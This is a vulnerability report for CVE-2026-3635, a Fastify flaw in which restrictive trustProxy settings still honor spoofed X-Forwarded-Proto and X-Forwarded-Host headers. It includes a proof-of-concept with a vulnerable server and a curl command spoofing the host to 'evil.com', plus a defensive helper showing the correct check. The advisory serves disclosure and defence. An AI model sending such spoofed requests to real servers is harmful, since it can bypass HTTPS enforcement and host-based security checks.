Security Vulnerability Report
CVE-2026-3635 CVSS 6.1 MEDIUM

CVE-2026-3635

Published: 2026-03-23 14:16:35
Last Modified: 2026-04-16 17:46:59
Source: ce714d77-add3-4f53-aff5-83d477b104bb

Description

Summary

When trustProxy is configured with a restrictive trust function (e.g., a specific IP like trustProxy: '10.0.0.1', a subnet, a hop count, or a custom function), the request.protocol and request.host getters read the X-Forwarded-Proto and X-Forwarded-Host headers from any connection, including connections from untrusted IPs. This allows an attacker connecting directly to Fastify (bypassing the proxy) to spoof both the protocol and host seen by the application.

Affected Versions

fastify <= 5.8.2

Impact

Applications using request.protocol or request.host for security decisions (HTTPS enforcement, secure cookie flags, CSRF origin checks, URL construction, host-based routing) are affected when trustProxy is configured with a restrictive trust function.

When trustProxy: true (trust everything), both host and protocol trust all forwarded headers; this is expected behavior. The vulnerability only manifests with restrictive trust configurations.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:fastify:fastify:*:*:*:*:*:node.js:*:* - VULNERABLE
fastify <= 5.8.2 (fixed in 5.8.3)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```javascript
// Vulnerable Fastify server configuration (fastify <= 5.8.2)
const Fastify = require('fastify');

// Configure trustProxy to trust only a specific IP (restrictive).
// In a real deployment this is intended to trust only the reverse proxy.
const server = Fastify({
  logger: true,
  trustProxy: (ip) => ip === '10.0.0.1' // Restrictive trust function
});

server.register(require('@fastify/helmet'));

server.get('/', async (request, reply) => {
  // Vulnerable getters: read X-Forwarded-* headers even from untrusted IPs
  const protocol = request.protocol;
  const host = request.host;

  // Security decision based on possibly spoofed headers
  if (protocol !== 'https') {
    return { error: 'HTTPS required', detectedHost: host };
  }
  return { message: 'Success', host, protocol };
});

const start = async () => {
  try {
    await server.listen({ port: 3000, host: '0.0.0.0' });
  } catch (err) {
    server.log.error(err);
    process.exit(1);
  }
};
start();

/*
 * Attack Scenario (run from attacker machine):
 * Direct connection to Fastify, bypassing the trusted proxy.
 * Command:
 *   curl -H "X-Forwarded-Host: evil.com" -H "X-Forwarded-Proto: https" http://<target-ip>:3000/
 *
 * Result:
 *   The server will treat the request as coming from 'evil.com' via HTTPS,
 *   potentially bypassing security checks or redirecting to malicious URLs.
 */
```
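As an added example that is not Fastify's own code, the following standalone helper shows the check the getters should apply: forwarded headers are honored only when the trust function accepts the socket's remote address, so a direct connection from an untrusted peer sees the socket's own protocol and Host. The request shape, toTrustFn and resolveOrigin are assumptions of this example, and the hop argument of Fastify's trust function is simplified to 0.

```javascript
// Added example, not Fastify's code: resolve protocol/host the way a
// restrictive trustProxy should, honoring X-Forwarded-* only when the
// socket's remote address passes the trust function.

// Normalize the trustProxy option into a predicate over the peer address.
// Assumed shapes: boolean, a single IP string, an array of IPs, or a function.
function toTrustFn(trustProxy) {
  if (typeof trustProxy === 'function') return trustProxy;
  if (trustProxy === true) return () => true;
  if (typeof trustProxy === 'string') return (ip) => ip === trustProxy;
  if (Array.isArray(trustProxy)) return (ip) => trustProxy.includes(ip);
  return () => false; // false/undefined: never trust forwarded headers
}

// req is a minimal request-like object: { remoteAddress, encrypted, headers }.
// The hop argument of Fastify's trust function is simplified to 0 here.
function resolveOrigin(req, trustProxy) {
  const trusted = Boolean(toTrustFn(trustProxy)(req.remoteAddress, 0));
  const socketProto = req.encrypted ? 'https' : 'http';
  const socketHost = req.headers['host'];
  if (!trusted) {
    // Untrusted peer (e.g. a direct connection bypassing the proxy):
    // ignore forwarded headers entirely and report the socket's own values.
    return { protocol: socketProto, host: socketHost, trusted: false };
  }
  // Trusted proxy: take the leftmost value of each forwarded header,
  // falling back to socket values when the header is missing or malformed.
  const fwdProto = (req.headers['x-forwarded-proto'] || '').split(',')[0].trim().toLowerCase();
  const fwdHost = (req.headers['x-forwarded-host'] || '').split(',')[0].trim();
  return {
    protocol: fwdProto === 'https' || fwdProto === 'http' ? fwdProto : socketProto,
    host: fwdHost || socketHost,
    trusted: true,
  };
}

// Constructed sample requests: identical spoofed headers sent from an
// untrusted peer and from the trusted proxy address.
const spoofedHeaders = {
  host: 'app.internal:3000',
  'x-forwarded-proto': 'https',
  'x-forwarded-host': 'evil.example',
};
const fromAttacker = { remoteAddress: '203.0.113.9', encrypted: false, headers: spoofedHeaders };
const fromProxy = { remoteAddress: '10.0.0.1', encrypted: false, headers: spoofedHeaders };

console.log(resolveOrigin(fromAttacker, (ip) => ip === '10.0.0.1')); // http / app.internal:3000
console.log(resolveOrigin(fromProxy, (ip) => ip === '10.0.0.1'));    // https / evil.example
```

With trustProxy: true the same spoofed headers are honored from any peer, which matches the advisory's note that this is expected behavior for an unrestricted trust setting.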

Weakness

CWE-348 (Use of Less Trusted Source)

References

https://github.com/fastify/fastify/security/advisories/GHSA-444r-cwp2-x5xf (Vendor Advisory)
https://cna.openjsf.org/security-advisories.html (Third Party Advisory)
https://www.cve.org/CVERecord?id=CVE-2026-3635 (Third Party Advisory)
